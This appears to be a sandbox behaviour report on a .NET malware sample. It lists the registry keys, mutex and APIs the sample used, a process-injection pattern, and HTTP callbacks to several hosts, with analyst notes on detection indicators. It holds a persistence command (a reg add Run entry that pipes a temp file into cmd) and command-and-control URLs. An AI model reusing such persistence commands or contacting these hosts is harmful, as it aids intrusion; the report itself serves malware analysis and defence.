HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas

Write Keys

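HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas

Note: this Run value is the one set by the `reg add` command listed under Execute Commands. Its data, as shown there, pipes the contents of C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt into cmd, so the text file is the item to collect when following this autostart entry. The same section also shows chdsks.exe being started from the user's Startup folder, a second autostart location to check.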

Delete Keys

Nothing to display

Mutexes

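Global\CLR_CASOFF_MUTEX

Note: this mutex is created by the .NET runtime and shows up for .NET programs in general, so it is not a sample-specific indicator.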

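Resolved APIs

Note: many entries below appear to be resolved by the .NET runtime during start-up (mscoree.dll, mscoreei.dll, mscorwks.dll and the kernel32/advapi32 functions they depend on) and say little about the sample. For triage, the entries that stand out are CreateProcessW together with the group at the end of the list (VirtualAllocEx, NtUnmapViewOfSection, WriteProcessMemory, GetThreadContext/SetThreadContext, ResumeThread), a combination consistent with code being written into another process, and IsDebuggerPresent, NtQueryInformationProcess and DebugActiveProcess, which match the report's Anti Debug tag.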

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.GlobalMemoryStatusEx
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.GetModuleFileNameW
shfolder.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.LocalFree
kernel32.dll.CreatePipe
kernel32.dll.DuplicateHandle
kernel32.dll.GetStdHandle
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.CreateProcessW
kernel32.dll.GetFileType
kernel32.dll.GetConsoleCP
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.GetConsoleOutputCP
kernel32.dll.WriteFile
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
kernel32.dll.SetThreadUILanguage
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
ntdll.dll.NtQueryInformationProcess
kernel32.dll.GetTempPathW
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess

Execute Commands

"cmd"
"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe"
reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "chdskskas" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt" | cmd"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration (seconds)
Seven01_64 Seven01_64 VirtualBox 2018-03-22 17:41:03 2018-03-22 17:43:53 170

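16 HTTP Request(s) detected

Note: the requests shown below share the path /hx211/ and the parameter names T8kD and Vnw0Z. The Vnw0Z value is identical in every GET shown, the POSTs carry the same User-Agent string, and the Content-Length values 2198 and 57322 recur across hosts. These shared traits are more durable for network detection than the individual hostnames. The IP addresses are those resolved during this run (2018-03-22) and may have changed since.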

http://www.oneconvey.com/hx211/?T8kD=9PqKCYaL4ktdzdkjrzryBrlutbCL2A7sV4xpCECdOwR61Acufzdy+EGBMBd8ZgLHII3M4+F+&Vnw0Z=-Z2hTbdPQ2dhN4y
  • Hostname: www.oneconvey.com
  • IP Address: 192.161.187.200
  • Port: 80
  • Count: 1

GET /hx211/?T8kD=9PqKCYaL4ktdzdkjrzryBrlutbCL2A7sV4xpCECdOwR61Acufzdy+EGBMBd8ZgLHII3M4+F+&Vnw0Z=-Z2hTbdPQ2dhN4y HTTP/1.1
Host: www.oneconvey.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.findingourspot.com/hx211/?T8kD=y5lVWRGfsSZED45cYSa2JRaiiXo50zt1/cPv7v7UQykSw/3CcZo8r43qtablqdkikYz49EWl&Vnw0Z=-Z2hTbdPQ2dhN4y
  • Hostname: www.findingourspot.com
  • IP Address: 216.58.205.115
  • Port: 80
  • Count: 1

